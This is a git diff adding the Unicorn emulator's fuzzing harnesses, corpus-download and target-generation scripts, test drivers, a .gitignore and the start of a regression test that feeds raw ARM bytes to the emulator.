$(CC) $< $(ARCHIVE) ${CFLAGS} $(LDFLAGS) -o $(call staticname,$@) +endef + + +staticname = $(subst $(BIN_EXT),,$(1)).static$(BIN_EXT) + +define log + @printf " %-7s %s\n" "$(1)" "$(2)" +endef + +define compile + ${CC} ${CFLAGS} -c $< -o $@ +endef diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/Makefile b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/Makefile new file mode 100644 index 0000000..c0b6946 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/Makefile @@ -0,0 +1,23 @@ +CFLAGS += -L ../../ -I ../../include + +UNAME_S := $(shell uname -s) +LDFLAGS += -pthread +ifeq ($(UNAME_S), Linux) +LDFLAGS += -lrt +endif + +LDFLAGS += ../../libunicorn.a + + +ALL_TESTS_SOURCES = $(wildcard fuzz*.c) +ALL_TESTS = $(ALL_TESTS_SOURCES:%.c=%) + +.PHONY: all +all: ${ALL_TESTS} + +.PHONY: clean +clean: + rm -rf ${ALL_TESTS} + +fuzz%: fuzz%.c + $(CC) $(CFLAGS) $^ onedir.c $(LDFLAGS) -o $@ diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/dlcorpus.sh 
b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/dlcorpus.sh new file mode 100644 index 0000000..f159e80 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/dlcorpus.sh @@ -0,0 +1,11 @@ +#/bin/sh +#change to script directory +cd `dirname $0` +ls fuzz_emu*.c | sed 's/.c//' | while read target +do + #download public corpus + wget "https://storage.googleapis.com/unicorn-backup.clusterfuzz-external.appspot.com/corpus/libFuzzer/unicorn_$target/public.zip" + unzip -q public.zip -d corpus_$target + #run target on corpus + ./$target corpus_$target +done diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu.options b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu.options new file mode 100644 index 0000000..9fda93f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu.options @@ -0,0 +1,2 @@ +[libfuzzer] +max_len = 4096 diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_arm64_arm.c b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_arm64_arm.c new file mode 100644 index 0000000..9e694e8 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_arm64_arm.c @@ -0,0 +1,56 @@ +#include + + +// memory address where emulation starts +#define ADDRESS 0x1000000 + +uc_engine *uc; +int initialized = 0; +FILE * outfile = NULL; + + +int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { + uc_err err; + + if (initialized == 0) { + if (outfile == NULL) { + // we compute the output + outfile = fopen("/dev/null", "w"); + if (outfile == NULL) { + printf("failed opening /dev/null\n"); + abort(); + return 0; + } + } + + initialized = 1; + } + + // Not global as we must reset this structure + // Initialize emulator in supplied mode + err = uc_open(UC_ARCH_ARM64, UC_MODE_ARM, &uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_open() with error returned: %u\n", err); + abort(); + } + + // map 4MB memory for this emulation + uc_mem_map(uc, ADDRESS, 4 * 1024 * 
1024, UC_PROT_ALL); + + // write machine code to be emulated to memory + if (uc_mem_write(uc, ADDRESS, Data, Size)) { + printf("Failed to write emulation code to memory, quit!\n"); + abort(); + } + + // emulate code in infinite time & 4096 instructions + // avoid timeouts with infinite loops + err=uc_emu_start(uc, ADDRESS, ADDRESS + Size, 0, 0x1000); + if (err) { + fprintf(outfile, "Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); + } + + uc_close(uc); + + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_arm64_armbe.c b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_arm64_armbe.c new file mode 100644 index 0000000..716bf86 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_arm64_armbe.c @@ -0,0 +1,56 @@ +#include + + +// memory address where emulation starts +#define ADDRESS 0x1000000 + +uc_engine *uc; +int initialized = 0; +FILE * outfile = NULL; + + +int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { + uc_err err; + + if (initialized == 0) { + if (outfile == NULL) { + // we compute the output + outfile = fopen("/dev/null", "w"); + if (outfile == NULL) { + printf("failed opening /dev/null\n"); + abort(); + return 0; + } + } + + initialized = 1; + } + + // Not global as we must reset this structure + // Initialize emulator in supplied mode + err = uc_open(UC_ARCH_ARM64, UC_MODE_ARM + UC_MODE_BIG_ENDIAN, &uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_open() with error returned: %u\n", err); + abort(); + } + + // map 4MB memory for this emulation + uc_mem_map(uc, ADDRESS, 4 * 1024 * 1024, UC_PROT_ALL); + + // write machine code to be emulated to memory + if (uc_mem_write(uc, ADDRESS, Data, Size)) { + printf("Failed to write emulation code to memory, quit!\n"); + abort(); + } + + // emulate code in infinite time & 4096 instructions + // avoid timeouts with infinite loops + err=uc_emu_start(uc, ADDRESS, ADDRESS + Size, 0, 0x1000); + if (err) { 
+ fprintf(outfile, "Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); + } + + uc_close(uc); + + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_arm_arm.c b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_arm_arm.c new file mode 100644 index 0000000..ca39317 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_arm_arm.c @@ -0,0 +1,56 @@ +#include + + +// memory address where emulation starts +#define ADDRESS 0x1000000 + +uc_engine *uc; +int initialized = 0; +FILE * outfile = NULL; + + +int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { + uc_err err; + + if (initialized == 0) { + if (outfile == NULL) { + // we compute the output + outfile = fopen("/dev/null", "w"); + if (outfile == NULL) { + printf("failed opening /dev/null\n"); + abort(); + return 0; + } + } + + initialized = 1; + } + + // Not global as we must reset this structure + // Initialize emulator in supplied mode + err = uc_open(UC_ARCH_ARM, UC_MODE_ARM, &uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_open() with error returned: %u\n", err); + abort(); + } + + // map 4MB memory for this emulation + uc_mem_map(uc, ADDRESS, 4 * 1024 * 1024, UC_PROT_ALL); + + // write machine code to be emulated to memory + if (uc_mem_write(uc, ADDRESS, Data, Size)) { + printf("Failed to write emulation code to memory, quit!\n"); + abort(); + } + + // emulate code in infinite time & 4096 instructions + // avoid timeouts with infinite loops + err=uc_emu_start(uc, ADDRESS, ADDRESS + Size, 0, 0x1000); + if (err) { + fprintf(outfile, "Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); + } + + uc_close(uc); + + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_arm_armbe.c b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_arm_armbe.c new file mode 100644 index 0000000..aadd385 --- /dev/null +++ 
b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_arm_armbe.c @@ -0,0 +1,56 @@ +#include + + +// memory address where emulation starts +#define ADDRESS 0x1000000 + +uc_engine *uc; +int initialized = 0; +FILE * outfile = NULL; + + +int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { + uc_err err; + + if (initialized == 0) { + if (outfile == NULL) { + // we compute the output + outfile = fopen("/dev/null", "w"); + if (outfile == NULL) { + printf("failed opening /dev/null\n"); + abort(); + return 0; + } + } + + initialized = 1; + } + + // Not global as we must reset this structure + // Initialize emulator in supplied mode + err = uc_open(UC_ARCH_ARM, UC_MODE_ARM + UC_MODE_BIG_ENDIAN, &uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_open() with error returned: %u\n", err); + abort(); + } + + // map 4MB memory for this emulation + uc_mem_map(uc, ADDRESS, 4 * 1024 * 1024, UC_PROT_ALL); + + // write machine code to be emulated to memory + if (uc_mem_write(uc, ADDRESS, Data, Size)) { + printf("Failed to write emulation code to memory, quit!\n"); + abort(); + } + + // emulate code in infinite time & 4096 instructions + // avoid timeouts with infinite loops + err=uc_emu_start(uc, ADDRESS, ADDRESS + Size, 0, 0x1000); + if (err) { + fprintf(outfile, "Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); + } + + uc_close(uc); + + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_arm_thumb.c b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_arm_thumb.c new file mode 100644 index 0000000..d50dd6a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_arm_thumb.c @@ -0,0 +1,56 @@ +#include + + +// memory address where emulation starts +#define ADDRESS 0x1000000 + +uc_engine *uc; +int initialized = 0; +FILE * outfile = NULL; + + +int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { + uc_err err; + + if (initialized == 0) { + if (outfile == NULL) { + 
// we compute the output + outfile = fopen("/dev/null", "w"); + if (outfile == NULL) { + printf("failed opening /dev/null\n"); + abort(); + return 0; + } + } + + initialized = 1; + } + + // Not global as we must reset this structure + // Initialize emulator in supplied mode + err = uc_open(UC_ARCH_ARM, UC_MODE_THUMB, &uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_open() with error returned: %u\n", err); + abort(); + } + + // map 4MB memory for this emulation + uc_mem_map(uc, ADDRESS, 4 * 1024 * 1024, UC_PROT_ALL); + + // write machine code to be emulated to memory + if (uc_mem_write(uc, ADDRESS, Data, Size)) { + printf("Failed to write emulation code to memory, quit!\n"); + abort(); + } + + // emulate code in infinite time & 4096 instructions + // avoid timeouts with infinite loops + err=uc_emu_start(uc, ADDRESS, ADDRESS + Size, 0, 0x1000); + if (err) { + fprintf(outfile, "Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); + } + + uc_close(uc); + + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_m68k_be.c b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_m68k_be.c new file mode 100644 index 0000000..cd2bf59 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_m68k_be.c @@ -0,0 +1,56 @@ +#include + + +// memory address where emulation starts +#define ADDRESS 0x1000000 + +uc_engine *uc; +int initialized = 0; +FILE * outfile = NULL; + + +int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { + uc_err err; + + if (initialized == 0) { + if (outfile == NULL) { + // we compute the output + outfile = fopen("/dev/null", "w"); + if (outfile == NULL) { + printf("failed opening /dev/null\n"); + abort(); + return 0; + } + } + + initialized = 1; + } + + // Not global as we must reset this structure + // Initialize emulator in supplied mode + err = uc_open(UC_ARCH_M68K, UC_MODE_BIG_ENDIAN, &uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_open() with error 
returned: %u\n", err); + abort(); + } + + // map 4MB memory for this emulation + uc_mem_map(uc, ADDRESS, 4 * 1024 * 1024, UC_PROT_ALL); + + // write machine code to be emulated to memory + if (uc_mem_write(uc, ADDRESS, Data, Size)) { + printf("Failed to write emulation code to memory, quit!\n"); + abort(); + } + + // emulate code in infinite time & 4096 instructions + // avoid timeouts with infinite loops + err=uc_emu_start(uc, ADDRESS, ADDRESS + Size, 0, 0x1000); + if (err) { + fprintf(outfile, "Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); + } + + uc_close(uc); + + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_mips_32be.c b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_mips_32be.c new file mode 100644 index 0000000..dbe3141 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_mips_32be.c @@ -0,0 +1,56 @@ +#include + + +// memory address where emulation starts +#define ADDRESS 0x1000000 + +uc_engine *uc; +int initialized = 0; +FILE * outfile = NULL; + + +int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { + uc_err err; + + if (initialized == 0) { + if (outfile == NULL) { + // we compute the output + outfile = fopen("/dev/null", "w"); + if (outfile == NULL) { + printf("failed opening /dev/null\n"); + abort(); + return 0; + } + } + + initialized = 1; + } + + // Not global as we must reset this structure + // Initialize emulator in supplied mode + err = uc_open(UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_BIG_ENDIAN, &uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_open() with error returned: %u\n", err); + abort(); + } + + // map 4MB memory for this emulation + uc_mem_map(uc, ADDRESS, 4 * 1024 * 1024, UC_PROT_ALL); + + // write machine code to be emulated to memory + if (uc_mem_write(uc, ADDRESS, Data, Size)) { + printf("Failed to write emulation code to memory, quit!\n"); + abort(); + } + + // emulate code in infinite time & 4096 instructions + 
// avoid timeouts with infinite loops + err=uc_emu_start(uc, ADDRESS, ADDRESS + Size, 0, 0x1000); + if (err) { + fprintf(outfile, "Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); + } + + uc_close(uc); + + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_mips_32le.c b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_mips_32le.c new file mode 100644 index 0000000..02786ce --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_mips_32le.c @@ -0,0 +1,56 @@ +#include + + +// memory address where emulation starts +#define ADDRESS 0x1000000 + +uc_engine *uc; +int initialized = 0; +FILE * outfile = NULL; + + +int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { + uc_err err; + + if (initialized == 0) { + if (outfile == NULL) { + // we compute the output + outfile = fopen("/dev/null", "w"); + if (outfile == NULL) { + printf("failed opening /dev/null\n"); + abort(); + return 0; + } + } + + initialized = 1; + } + + // Not global as we must reset this structure + // Initialize emulator in supplied mode + err = uc_open(UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_LITTLE_ENDIAN, &uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_open() with error returned: %u\n", err); + abort(); + } + + // map 4MB memory for this emulation + uc_mem_map(uc, ADDRESS, 4 * 1024 * 1024, UC_PROT_ALL); + + // write machine code to be emulated to memory + if (uc_mem_write(uc, ADDRESS, Data, Size)) { + printf("Failed to write emulation code to memory, quit!\n"); + abort(); + } + + // emulate code in infinite time & 4096 instructions + // avoid timeouts with infinite loops + err=uc_emu_start(uc, ADDRESS, ADDRESS + Size, 0, 0x1000); + if (err) { + fprintf(outfile, "Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); + } + + uc_close(uc); + + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_sparc_32be.c 
b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_sparc_32be.c new file mode 100644 index 0000000..8d3209c --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_sparc_32be.c @@ -0,0 +1,56 @@ +#include + + +// memory address where emulation starts +#define ADDRESS 0x1000000 + +uc_engine *uc; +int initialized = 0; +FILE * outfile = NULL; + + +int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { + uc_err err; + + if (initialized == 0) { + if (outfile == NULL) { + // we compute the output + outfile = fopen("/dev/null", "w"); + if (outfile == NULL) { + printf("failed opening /dev/null\n"); + abort(); + return 0; + } + } + + initialized = 1; + } + + // Not global as we must reset this structure + // Initialize emulator in supplied mode + err = uc_open(UC_ARCH_SPARC, UC_MODE_SPARC32|UC_MODE_BIG_ENDIAN, &uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_open() with error returned: %u\n", err); + abort(); + } + + // map 4MB memory for this emulation + uc_mem_map(uc, ADDRESS, 4 * 1024 * 1024, UC_PROT_ALL); + + // write machine code to be emulated to memory + if (uc_mem_write(uc, ADDRESS, Data, Size)) { + printf("Failed to write emulation code to memory, quit!\n"); + abort(); + } + + // emulate code in infinite time & 4096 instructions + // avoid timeouts with infinite loops + err=uc_emu_start(uc, ADDRESS, ADDRESS + Size, 0, 0x1000); + if (err) { + fprintf(outfile, "Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); + } + + uc_close(uc); + + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_x86_16.c b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_x86_16.c new file mode 100644 index 0000000..3e5c6c4 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_x86_16.c @@ -0,0 +1,56 @@ +#include + + +// memory address where emulation starts +#define ADDRESS 0x1000000 + +uc_engine *uc; +int initialized = 0; +FILE * outfile = NULL; + + 
+int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { + uc_err err; + + if (initialized == 0) { + if (outfile == NULL) { + // we compute the output + outfile = fopen("/dev/null", "w"); + if (outfile == NULL) { + printf("failed opening /dev/null\n"); + abort(); + return 0; + } + } + + initialized = 1; + } + + // Not global as we must reset this structure + // Initialize emulator in supplied mode + err = uc_open(UC_ARCH_X86, UC_MODE_16, &uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_open() with error returned: %u\n", err); + abort(); + } + + // map 4MB memory for this emulation + uc_mem_map(uc, ADDRESS, 4 * 1024 * 1024, UC_PROT_ALL); + + // write machine code to be emulated to memory + if (uc_mem_write(uc, ADDRESS, Data, Size)) { + printf("Failed to write emulation code to memory, quit!\n"); + abort(); + } + + // emulate code in infinite time & 4096 instructions + // avoid timeouts with infinite loops + err=uc_emu_start(uc, ADDRESS, ADDRESS + Size, 0, 0x1000); + if (err) { + fprintf(outfile, "Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); + } + + uc_close(uc); + + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_x86_32.c b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_x86_32.c new file mode 100644 index 0000000..d1e3305 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_x86_32.c @@ -0,0 +1,56 @@ +#include + + +// memory address where emulation starts +#define ADDRESS 0x1000000 + +uc_engine *uc; +int initialized = 0; +FILE * outfile = NULL; + + +int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { + uc_err err; + + if (initialized == 0) { + if (outfile == NULL) { + // we compute the output + outfile = fopen("/dev/null", "w"); + if (outfile == NULL) { + printf("failed opening /dev/null\n"); + abort(); + return 0; + } + } + + initialized = 1; + } + + // Not global as we must reset this structure + // Initialize emulator in supplied 
mode + err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_open() with error returned: %u\n", err); + abort(); + } + + // map 4MB memory for this emulation + uc_mem_map(uc, ADDRESS, 4 * 1024 * 1024, UC_PROT_ALL); + + // write machine code to be emulated to memory + if (uc_mem_write(uc, ADDRESS, Data, Size)) { + printf("Failed to write emulation code to memory, quit!\n"); + abort(); + } + + // emulate code in infinite time & 4096 instructions + // avoid timeouts with infinite loops + err=uc_emu_start(uc, ADDRESS, ADDRESS + Size, 0, 0x1000); + if (err) { + fprintf(outfile, "Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); + } + + uc_close(uc); + + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_x86_64.c b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_x86_64.c new file mode 100644 index 0000000..f4f63cb --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_x86_64.c @@ -0,0 +1,56 @@ +#include + + +// memory address where emulation starts +#define ADDRESS 0x1000000 + +uc_engine *uc; +int initialized = 0; +FILE * outfile = NULL; + + +int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { + uc_err err; + + if (initialized == 0) { + if (outfile == NULL) { + // we compute the output + outfile = fopen("/dev/null", "w"); + if (outfile == NULL) { + printf("failed opening /dev/null\n"); + abort(); + return 0; + } + } + + initialized = 1; + } + + // Not global as we must reset this structure + // Initialize emulator in supplied mode + err = uc_open(UC_ARCH_X86, UC_MODE_64, &uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_open() with error returned: %u\n", err); + abort(); + } + + // map 4MB memory for this emulation + uc_mem_map(uc, ADDRESS, 4 * 1024 * 1024, UC_PROT_ALL); + + // write machine code to be emulated to memory + if (uc_mem_write(uc, ADDRESS, Data, Size)) { + printf("Failed to write emulation code to memory, 
quit!\n"); + abort(); + } + + // emulate code in infinite time & 4096 instructions + // avoid timeouts with infinite loops + err=uc_emu_start(uc, ADDRESS, ADDRESS + Size, 0, 0x1000); + if (err) { + fprintf(outfile, "Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); + } + + uc_close(uc); + + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/gentargets.sh b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/gentargets.sh new file mode 100644 index 0000000..9238505 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/gentargets.sh @@ -0,0 +1,21 @@ +#/bin/sh +# generates all fuzz targets for different architectures from the template in fuzz_emu_x86_32.c + +sed 's/UC_MODE_32/UC_MODE_64/' fuzz_emu_x86_32.c > fuzz_emu_x86_64.c +sed 's/UC_MODE_32/UC_MODE_16/' fuzz_emu_x86_32.c > fuzz_emu_x86_16.c + +sed 's/UC_ARCH_X86/UC_ARCH_SPARC/' fuzz_emu_x86_32.c | sed 's/UC_MODE_32/UC_MODE_SPARC32|UC_MODE_BIG_ENDIAN/' > fuzz_emu_sparc_32be.c +#sed 's/UC_ARCH_X86/UC_ARCH_SPARC/' fuzz_emu_x86_32.c | sed 's/UC_MODE_32/UC_MODE_SPARC64|UC_MODE_BIG_ENDIAN/' > fuzz_emu_sparc_64be.c + +sed 's/UC_ARCH_X86/UC_ARCH_M68K/' fuzz_emu_x86_32.c | sed 's/UC_MODE_32/UC_MODE_BIG_ENDIAN/' > fuzz_emu_m68k_be.c + +sed 's/UC_ARCH_X86/UC_ARCH_MIPS/' fuzz_emu_x86_32.c | sed 's/UC_MODE_32/UC_MODE_MIPS32 + UC_MODE_LITTLE_ENDIAN/' > fuzz_emu_mips_32le.c +sed 's/UC_ARCH_X86/UC_ARCH_MIPS/' fuzz_emu_x86_32.c | sed 's/UC_MODE_32/UC_MODE_MIPS32 + UC_MODE_BIG_ENDIAN/' > fuzz_emu_mips_32be.c + +sed 's/UC_ARCH_X86/UC_ARCH_ARM64/' fuzz_emu_x86_32.c | sed 's/UC_MODE_32/UC_MODE_ARM/' > fuzz_emu_arm64_arm.c +sed 's/UC_ARCH_X86/UC_ARCH_ARM64/' fuzz_emu_x86_32.c | sed 's/UC_MODE_32/UC_MODE_ARM + UC_MODE_BIG_ENDIAN/' > fuzz_emu_arm64_armbe.c + +sed 's/UC_ARCH_X86/UC_ARCH_ARM/' fuzz_emu_x86_32.c | sed 's/UC_MODE_32/UC_MODE_ARM/' > fuzz_emu_arm_arm.c +sed 's/UC_ARCH_X86/UC_ARCH_ARM/' fuzz_emu_x86_32.c | sed 's/UC_MODE_32/UC_MODE_THUMB/' > 
fuzz_emu_arm_thumb.c +sed 's/UC_ARCH_X86/UC_ARCH_ARM/' fuzz_emu_x86_32.c | sed 's/UC_MODE_32/UC_MODE_ARM + UC_MODE_BIG_ENDIAN/' > fuzz_emu_arm_armbe.c +#sed 's/UC_ARCH_X86/UC_ARCH_ARM/' fuzz_emu_x86_32.c | sed 's/UC_MODE_32/UC_MODE_THUMB + UC_MODE_BIG_ENDIAN/' > fuzz_emu_arm_thumbbe.c diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/onedir.c b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/onedir.c new file mode 100644 index 0000000..21f9a76 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/onedir.c @@ -0,0 +1,80 @@ +#include +#include +#include +#include +#include + +int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size); + +int main(int argc, char** argv) +{ + FILE * fp; + uint8_t Data[0x1000]; + size_t Size; + DIR *d; + struct dirent *dir; + int r = 0; + int i; + + if (argc != 2) { + return 1; + } + + d = opendir(argv[1]); + if (d == NULL) { + printf("Invalid directory\n"); + return 2; + } + if (chdir(argv[1]) != 0) { + closedir(d); + printf("Invalid directory\n"); + return 2; + } + + printf("Starting directory %s\n", argv[1]); + while((dir = readdir(d)) != NULL) { + //opens the file, get its size, and reads it into a buffer + if (dir->d_type != DT_REG) { + continue; + } + //printf("Running file %s\n", dir->d_name); + fflush(stdout); + fp = fopen(dir->d_name, "rb"); + if (fp == NULL) { + r = 3; + break; + } + if (fseek(fp, 0L, SEEK_END) != 0) { + fclose(fp); + r = 4; + break; + } + Size = ftell(fp); + if (Size == (size_t) -1) { + fclose(fp); + r = 5; + break; + } else if (Size > 0x1000) { + fclose(fp); + continue; + } + if (fseek(fp, 0L, SEEK_SET) != 0) { + fclose(fp); + r = 7; + break; + } + if (fread(Data, Size, 1, fp) != 1) { + fclose(fp); + r = 8; + break; + } + + //lauch fuzzer + LLVMFuzzerTestOneInput(Data, Size); + fclose(fp); + } + closedir(d); + printf("Ok : whole directory finished %s\n", argv[1]); + return r; +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/onefile.c 
b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/onefile.c new file mode 100644 index 0000000..3146cc0 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/onefile.c @@ -0,0 +1,49 @@ +#include +#include +#include + +int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size); + +int main(int argc, char** argv) +{ + FILE * fp; + uint8_t *Data; + size_t Size; + + if (argc != 2) { + return 1; + } + //opens the file, get its size, and reads it into a buffer + fp = fopen(argv[1], "rb"); + if (fp == NULL) { + return 2; + } + if (fseek(fp, 0L, SEEK_END) != 0) { + fclose(fp); + return 2; + } + Size = ftell(fp); + if (Size == (size_t) -1) { + fclose(fp); + return 2; + } + if (fseek(fp, 0L, SEEK_SET) != 0) { + fclose(fp); + return 2; + } + Data = malloc(Size); + if (Data == NULL) { + fclose(fp); + return 2; + } + if (fread(Data, Size, 1, fp) != 1) { + fclose(fp); + return 2; + } + + //lauch fuzzer + LLVMFuzzerTestOneInput(Data, Size); + fclose(fp); + return 0; +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/.gitignore b/ai_anti_malware/unicorn/unicorn-master/tests/regress/.gitignore new file mode 100644 index 0000000..ca97ad9 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/.gitignore @@ -0,0 +1,40 @@ +!*.c + +arm_enable_vfp +map_crash +sigill +sigill2 +block_test +map_write +ro_mem_test +nr_mem_test +timeout_segfault +rep_movsb +mips_kseg0_1 +eflags_nosync +00opcode_uc_crash +eflags_noset +invalid_read_in_cpu_tb_exec +invalid_write_in_cpu_tb_exec_x86_64 +x86_16_segfault +mips_invalid_read_of_size_4_when_tracing +invalid_read_in_tb_flush_x86_64 +sparc_jump_to_zero +mips_delay_slot_code_hook +threaded_emu_start +emu_stop_in_hook_overrun +mips_branch_likely_issue +emu_clear_errors +001-bad_condition_code_0xe +002-qemu__fatal__unimplemented_control_register_write_0xffb___0x0 +003-qemu__fatal__wdebug_not_implemented +004-segmentation_fault_1 +005-qemu__fatal__illegal_instruction__0000___00000404 
+006-qemu__fatal__illegal_instruction__0421___00040026 + +rw_hookstack +hook_extrainvoke +sysenter_hook_x86 + +memleak_* +mem_* diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/001-bad_condition_code_0xe.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/001-bad_condition_code_0xe.c new file mode 100644 index 0000000..bcc51e8 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/001-bad_condition_code_0xe.c @@ -0,0 +1,31 @@ +#include + +#define HARDWARE_ARCHITECTURE UC_ARCH_ARM +#define HARDWARE_MODE 16 +#define MEMORY_STARTING_ADDRESS 8192 +#define MEMORY_SIZE 4096 +#define MEMORY_PERMISSIONS 6 +#define BINARY_CODE "\x56\xe8\x46\x46\x80\xf6\x8c\x56\xff\xbf\xcd\x90\xda\xa0\xed\xe8\x46\x43\x45\xe5\x80\x90\x44\x46\x04" + +static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { + printf("hook_code(…) called\n"); +} + +int main(int argc, char **argv, char **envp) { + uc_engine *uc; + if (uc_open(HARDWARE_ARCHITECTURE, HARDWARE_MODE, &uc)) { + printf("uc_open(…) failed\n"); + return 1; + } + uc_mem_map(uc, MEMORY_STARTING_ADDRESS, MEMORY_SIZE, MEMORY_PERMISSIONS); + if (uc_mem_write(uc, MEMORY_STARTING_ADDRESS, BINARY_CODE, sizeof(BINARY_CODE) - 1)) { + printf("uc_mem_write(…) failed\n"); + return 1; + } + uc_hook trace; + uc_hook_add(uc, &trace, UC_HOOK_CODE, hook_code, NULL, (uint64_t)MEMORY_STARTING_ADDRESS, (uint64_t)(MEMORY_STARTING_ADDRESS + 1)); 